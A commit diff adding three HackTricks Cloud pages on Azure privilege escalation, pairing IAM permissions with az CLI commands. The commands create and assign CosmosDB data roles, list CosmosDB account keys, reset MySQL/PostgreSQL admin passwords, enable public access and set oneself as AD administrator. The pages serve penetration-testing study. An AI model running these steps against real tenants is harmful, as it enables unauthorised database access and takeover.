Add files via upload

2025-12-28 13:43:24 -08:00 · 2025-01-10 11:06:35 +01:00
parent 55fc400bf7
commit e8cee6743c
3 changed files with 277 additions and 0 deletions
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.md
@@ -0,0 +1,93 @@
+# Az - CosmosDB Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## CosmosDB Privesc
+For more information about SQL Database check:
+
+{% content-ref url="../az-services/az-cosmosDB.md" %}
+[az-cosmosDB.md](../az-services/az-cosmosDB.md)
+{% endcontent-ref %}
+
+### ("Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write", "Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/read") & ("Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write", "Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/read")
+
+With this permissions you can priviledge scalate giving a user the pemrissions to execute queries and connect to the database. First a definition role is created giving the necesary permissions and scopes.
+
+{% code overflow="wrap" %}
+```bash
+az cosmosdb sql role definition create \
+    --account-name <account_name> \
+    --resource-group <resource_group_name> \
+    --body '{
+      "Id": "<Random-Unique-ID>", # For example 12345678-1234-1234-1234-123456789az
+      "RoleName": "CustomReadRole",
+      "Type": "CustomRole",
+      "AssignableScopes": [
+        "/subscriptions/<subscription_id>/resourceGroups/sqldatabase/providers/Microsoft.DocumentDB/databaseAccounts/<account_name>"
+      ],
+      "Permissions": [
+        {
+          "DataActions": [
+            "Microsoft.DocumentDB/databaseAccounts/readMetadata",
+            "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/items/read",
+            "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/*"
+          ]
+        }
+      ]
+    }'
+```
+{% endcode %}
+
+After that the assigment of the definition is given to a user. After this that user can use the DefaultAzureCredential() connection method to execute queries.
+
+{% code overflow="wrap" %}
+```bash
+az cosmosdb sql role assignment create \
+    --account-name <account_name> \
+    --resource-group <resource_group_name> \
+    --role-definition-id <Random-Unique-ID-used-in-definition> \
+    --principal-id <principal_id-togive-perms> \
+    --scope "/"
+```
+{% endcode %}
+
+### "Microsoft.DocumentDB/databaseAccounts/listKeys/action"
+With this permission, you can retrieve the primary and secondary keys for an Azure Cosmos DB account. These keys provide full access to the database account and its resources, enabling actions such as data reads, writes, and configuration changes.
+
+{% code overflow="wrap" %}
+```bash
+az cosmosdb keys list \
+  --name <account_name> \
+  --resource-group <resource_group_name>
+
+```
+{% endcode %}
+
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.md
@@ -0,0 +1,91 @@
+# Az - MySQL Database Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## MySQL Database Privesc
+For more information about SQL Database check:
+
+{% content-ref url="../az-services/az-mysql.md" %}
+[az-mysql.md](../az-services/az-mysql.md)
+{% endcontent-ref %}
+
+### ""Microsoft.DBforMySQL/flexibleServers/read" && "Microsoft.DBforMySQL/flexibleServers/write"
+
+With this permission, you can create, update, or delete MySQL Flexible Server instances on Azure. This includes provisioning new servers, modifying existing server configurations, or decommissioning servers.
+
+{% code overflow="wrap" %}
+```bash
+az mysql flexible-server create \
+    --name <ServerName> \
+    --resource-group <ResourceGroupName> \
+    --location <Location> \
+    --admin-user <AdminUsername> \
+    --admin-password <AdminPassword> \
+    --sku-name <SkuName> \
+    --storage-size <StorageSizeInGB> \
+    --tier <PricingTier> \
+    --version <MySQLVersion>
+```
+{% endcode %}
+
+For example, this permissions allow changing the MySQL password, usefull of course in case that MySQL authentication is enabled.
+
+{% code overflow="wrap" %}
+```bash
+az mysql flexible-server update \
+    --resource-group <resource_group_name> \
+    --name <server_name> \
+    --admin-password <password_to_update>
+```
+{% endcode %}
+
+Additionally it is necesary to have the public access enabled if you want to access from a non private endpoint, to enable it:
+
+{% code overflow="wrap" %}
+```bash
+az mysql flexible-server update --resource-group <resource_group_name> --server-name <server_name> --public-access Enabled
+```
+{% endcode %}
+
+### ""Microsoft.DBforMySQL/flexibleServers/read", "Microsoft.DBforMySQL/flexibleServers/write", "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action", "Microsoft.DBforMySQL/flexibleServers/administrators/write" && "Microsoft.DBforMySQL/flexibleServers/administrators/read""
+
+With this permission, you can configure Azure Active Directory (AD) administrators for a MySQL Flexible Server. This can be exploited by setting oneself or another account as the AD administrator, granting full administrative control over the MySQL server. It's important that the flexible-server has a user assigned managed identities to use.
+
+{% code overflow="wrap" %}
+```bash
+az mysql flexible-server ad-admin create \
+    --resource-group <ResourceGroupName> \
+    --server-name <ServerName> \
+    --display-name <ADAdminDisplayName> \
+    --identity <IdentityNameOrID> \
+    --object-id <ObjectID>
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.md
@@ -0,0 +1,93 @@
+# Az - PostgreSQL Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## PostgreSQL Privesc
+For more information about SQL Database check:
+
+{% content-ref url="../az-services/az-postgresql.md" %}
+[az-postgresql.md](../az-services/az-postgresql.md)
+{% endcontent-ref %}
+
+### "Microsoft.DBforPostgreSQL/flexibleServers/read" && "Microsoft.DBforPostgreSQL/flexibleServers/write"
+
+With this permission, you can create, update, or delete PostgreSQL Flexible Server instances on Azure. This includes provisioning new servers, modifying existing server configurations, or decommissioning servers.
+
+{% code overflow="wrap" %}
+```bash
+az postgres flexible-server create \
+    --name <ServerName> \
+    --resource-group <ResourceGroupName> \
+    --location <Location> \
+    --admin-user <AdminUsername> \
+    --admin-password <AdminPassword> \
+    --sku-name <SkuName> \
+    --storage-size <StorageSizeInGB> \
+    --tier <PricingTier> \
+    --version <PostgreSQLVersion>
+```
+{% endcode %}
+
+For example, this permissions allow changing the PostgreSQL password, usefull of course in case that PostgreSQL authentication is enabled.
+
+{% code overflow="wrap" %}
+```bash
+az postgres flexible-server update \
+    --resource-group <resource_group_name> \
+    --name <server_name> \
+    --admin-password <password_to_update>
+```
+{% endcode %}
+
+Additionally it is necesary to have the public access enabled if you want to access from a non private endpoint, to enable it:
+
+{% code overflow="wrap" %}
+```bash
+az postgres flexible-server update --resource-group <resource_group_name> --server-name <server_name> --public-access Enabled
+```
+{% endcode %}
+
+### "Microsoft.DBforPostgreSQL/flexibleServers/read", "Microsoft.DBforPostgreSQL/flexibleServers/write", "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action", "Microsoft.DBforPostgreSQL/flexibleServers/administrators/write" && "Microsoft.DBforPostgreSQL/flexibleServers/administrators/read"
+
+With this permission, you can configure Azure Active Directory (AD) administrators for a PostgreSQL Flexible Server. This can be exploited by setting oneself or another account as the AD administrator, granting full administrative control over the PostgreSQL server. Updating existing principal is not supported yet so if there is one created you must delete it first.
+
+It's important that the flexible-server has a user assigned managed identities to use.
+
+{% code overflow="wrap" %}
+```bash
+az postgres flexible-server ad-admin create \
+    --resource-group <ResourceGroupName> \
+    --server-name <ServerName> \
+    --display-name <ADAdminDisplayName> \
+    --identity <IdentityNameOrID> \
+    --object-id <ObjectID>
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}